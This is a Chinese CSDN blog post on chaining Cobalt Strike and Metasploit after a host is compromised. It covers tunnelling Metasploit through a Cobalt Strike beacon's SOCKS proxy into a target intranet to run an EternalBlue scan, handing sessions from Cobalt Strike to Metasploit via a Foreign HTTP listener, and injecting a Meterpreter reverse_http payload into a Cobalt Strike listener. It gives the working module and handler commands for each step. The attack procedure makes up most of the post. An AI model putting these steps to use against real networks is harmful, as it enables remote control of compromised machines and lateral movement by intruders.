CobaltStrike和Metasploit相互联动

最新推荐文章于 2024-10-04 21:13:01 发布
最新推荐文章于 2024-10-04 21:13:01 发布
阅读量180 收藏
点赞数
分类专栏: 渗透框架 文章标签: 安全 网络 运维 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53747497/article/details/130458453
版权
文章介绍了如何利用CobaltStrike的socks代理将Metasploit带入目标内网执行操作,包括两种方法:一种是通过本地MSF设置代理,另一种是通过CS的ForeignHTTP监听器转发流量。这两种方法都涉及内网信息搜集和漏洞利用的协同工作。
摘要由CSDN通过智能技术生成

CobaltStrike联动Metasploit

CobaltStrike (简称CS)及 MetaSploit (简称MSF)各有所长,CS更适合作为 稳控平台,MSF更适用于与各类内网信息搜集及漏洞利用。为了取长补短,我们进行联动。

方法一

通过CS内置socks代理将本地MSF带入目标内网执行操作

思路:利用 beacon shell 在目标机器和团队服务器之间建立 socks , 而后再在本地利用通过 proxychains 之类的工具连到目标内网即可。

假设在cs上已经拿到了一台beacon。

1.CS 启动 Socks 代理

请添加图片描述

2.使用 proxychains 代理
另一台vps编辑 /etc/proxychains.conf 文件,添加 TeamServer 服务器 ip 和 socks 端口,就可以直接连到目标内网。

请添加图片描述

在目标机器上开启http.server的服务去验证是否挂代理成功。

成功代理访问到主机的页面。

请添加图片描述

3.MSF设置代理

让本地 MSF 所有模块的流量都从 CS 的 socks5 代理走

代理信息 > tunnel > 得到设置代理命令>隧道

请添加图片描述
请添加图片描述

然后在另一台的vps上开启Msf,把刚刚那个命令复制上去,然后执行永恒之蓝的探测模块进行攻击。

请添加图片描述
请添加图片描述

方法二(推荐)

1.CS 上创建一个 http 的外部监听器( Foreign HTTP )

请添加图片描述

2.在msf上开启监听。

use exploit/multi/handler 
set payload windows/meterpreter/reverse_http 
set lhost (内部ip) 
set lport 803
run -j

3.在cs上直接spawn for-http 直接把流量转到msf中,获得会话的权限。

请添加图片描述

注意:如果在msf中监听的端口提示被占用,那就监听新的端口,同时在cs上修改为msf监听的新端口,msf就可以成功执行监听。

Metasploit联动CobaltStrike

假设已经在msf中得到它的一个会话了。

1.在 CS 开启一个监听(Beacon HTTP)就平常的http的反向连接的会话就行。

2.MSF 上执行 payload 注入模块

use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http 
set DisablePayloadHandler true 
set lhost ip                #cobaltstrike监听的ip 
set lport 801               #cobaltstrike监听的端口 
set session 2               #这里是获得的session的id run

DisablePayloadHandler 默认为 false ,即 payload_inject 模块执行之后会在 本地生成一个新的 handler 监听器,由于设置执行的 payload 是去连接 Cobaltstrike 的监听器,所以这里我们设置为 true ,让它不再生成新的 handler 监听器。

3.注入成功,成功上线。

请添加图片描述

请添加图片描述

00zzz
关注
专栏目录
2024年网安最全Cobalt Strike汉化版——安装与使用教程_kali安装cobaltstrike4
2401_84264583的博客
05-01 1762
New Connection #新建连接,支持连接多个服务器端Preferences #设置Cobal Strike界面、控制台、以及输出报告样式、TeamServer连接记录Visualization #主要展示输出结果的视图VPN Interfaces #设置VPN接口Listenrs #创建监听器script Manager #脚本管理,可以通过Aggressorscripts脚本来加强自身,能够扩展菜单栏,Beacon命令行,提权脚本等close #退出连接2、View。
cobaltstrike文版.zip
05-17
这个“cobaltstrike文版.zip”文件包含了Cobalt Strike文版本,这对于使用者来说是一个很好的资源,能够帮助他们更好地理解和操作这款工具。 Cobalt Strike的核心功能包括: 1. **Beacon**:这是Cobalt ...
CobaltStrikeMetasploit联动方法
HAKUNAMATATATTA的博客
01-13 880
DisablePayloadHandler 默认为 false ,即 payload_inject 模块执行之后会在本地生成一个新的 handler 监听器,由于设置执行的 payload 是去连接Cobaltstrike 的监听器,所以这里我们设置为 true ,让它不再生成新的 handler监听器。CobaltStrike (简称CS)及 MetaSploit (简称MSF)各有所长,CS更适合作为稳控平台,MSF更适用于与各类内网信息搜集及漏洞利用。
Cobalt_StrikeMetasploit(msf)联动-Win或Linux不同系统之间互相弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
09-06 2512
Cobalt StrikeMsf(Metasploit)之间的相互派生shell。完整的记录了Windows系统被控主机的cs与msf互相反弹shell。Linux系统被控主机的反弹shell给cs和cs上的Linux主机反弹shell给msf
全网最全的Cobalt Strike使用教程-进阶篇
喜欢Python编程的程序员柚柚呀
08-17 7682
在这篇文章,斗哥将详细介绍一下Cobalt Strike的各个模块是干什么的以及部分模块的具体使用方式。
CobaltStrike(CS)与MetasploitFrameworkMSF联动
LuckySec
12-04 2465
0x01 CS与MSF CobaltStrike(简称CS)是一款美国Red Team开发的渗透测试神器。Armitage是一个MetasploitFramework(简称MSF)的图形化界面工具,而Cobaltstrike大家可以理解其为Armitage的商业版。 早期版本CobaltSrtike依赖MetasploitFramework框架,而现在CobaltStrike已经不再使用MetasploitFramework而是作为单独的平台使用,它分为客户端(Client)与服务端(Teamserver)
cobalt strike(cs)和metasploit(msf)联动
weixin_39251927的博客
05-11 5464
一、当cs获取到会话后反弹给msf 1、msf上操作 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.52.208 set lport 7777 exploit -j #-j 后台监听 2、CS上操作 首先有一个已经建立会话的shell,然后添加监听器Listener,HOST和PORT填写msf监听的地址IP:x.x.x.x,PORT:7777 配置内网穿透 如果msf主机处于
Cobalt Strike汉化版——安装与使用教程_kali安装cobaltstrike4
2401_84253894的博客
04-26 3387
Cobalt Strike是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。分为服务器和客户端,方便团队合作。cs服务器部署在公网控制着受害者主机,而攻击者可以直接访问cs服务器进而控制受害主机,不用再通过端口转发使用msf控制受害主机,简单方便!New Connection #新建连接,支持连接多个服务器端Preferences #设置Cobal Strike界面、控制台、以及输出报告样式、TeamServer连接记录。
2024年网络安全最全Cobalt Strike汉化版——安装与使用教程_kali安装cobaltstrike4
2401_84281629的博客
05-03 1386
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
cobalt strike 4.7
06-07
6. **兼容性和整合**:Cobalt Strike 4.7可能会增强与其他工具和服务的集成,如Metasploit框架或公共漏洞数据库,以便更有效地利用最新的漏洞信息。 7. **安全社区支持**:持续的社区支持和更新是Cobalt Strike受...
CS4.9.1.1-CobaltStrike4.9.1.1版
01-18
自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息...
cobaltstrike4.0
06-26
4. **集成第三方工具**:"third-party"这个文件夹可能包含了Cobalt Strike与第三方工具的整合,如Metasploit框架或其他情报收集工具,这可以扩展其功能范围,提高红队操作的效率。 5. **更新的文档**:通常,新版本...
.888勒索病毒解密方法|勒索病毒解决|勒索病毒恢复|数据库修复
数据恢复研究℃
10-01 772
引言在数字化时代,网络空间的威胁日益增多,其勒索病毒已成为数据安全领域的一大挑战。近期,.888勒索病毒作为一种新型的恶意软件,正逐渐引起人们的广泛关注。本文将详细介绍.888勒索病毒的特点、如何恢复被其加密的数据文件,以及预防该病毒的有效策略。.888勒索病毒不断更新和变异的特点,是其能够持续威胁网络安全的重要因素。
【蚂蚁HR-注册/登录安全分析报告】
09-28 1276
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
什么是托管安全信息和事件管理 SIEM?
网络研究观
09-28 1860
SIEM 解决方案是组织网络安全基础设施的重要组成部分
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。
weixin_64446270的博客
09-27 1506
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。Spring Security 提供了全面的安全服务,从基本的登录认证到复杂的访问控制,几乎涵盖了所有与安全相关的需求。
【隐私计算篇】多方安全计算之函数秘密共享(FSS)
最新发布
源泉的小广场
10-04 428
fss、函数秘密共享、函数秘密分享、分布式点函数、DPF、Distributed Point Function、多方安全计算、安全多方计算、MPC、多服务器PIR、SilentOT、PCG for tensor product from LPN and FSS
安全服务面试
m0_74402888的博客
09-28 774
内网的计算机可向 Internet 上的其他计算机发送连接请求,但 Internet 上其他。个列表的 IP 进行 SYN+ACK 的重试。明白这种攻击的基本原理,还是要从 TCP 连接建立的过程开始说起:大家都知道,TCP 与。的 IP 地址,如果攻击者以数万/秒的速度发送 SYN 报文,同时利用 SOCK_RAW。Internet 上的计算机,但 Internet 上的计算机无法访问局域网内的计算机。内网的计算机以 NAT(网络地址转换)协议,通过一个公共的网关访问 Internet。
MetasploitCobalt Strike生成木马的过程
03-25
总之,MetasploitCobalt Strike都是非常强大的网络安全工具,可以帮助渗透测试人员和安全研究人员生成各种漏洞利用和后门程序,提高安全测试和研究效率。在使用这些工具时,需要谨慎操作,避免对他人或自己造成...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值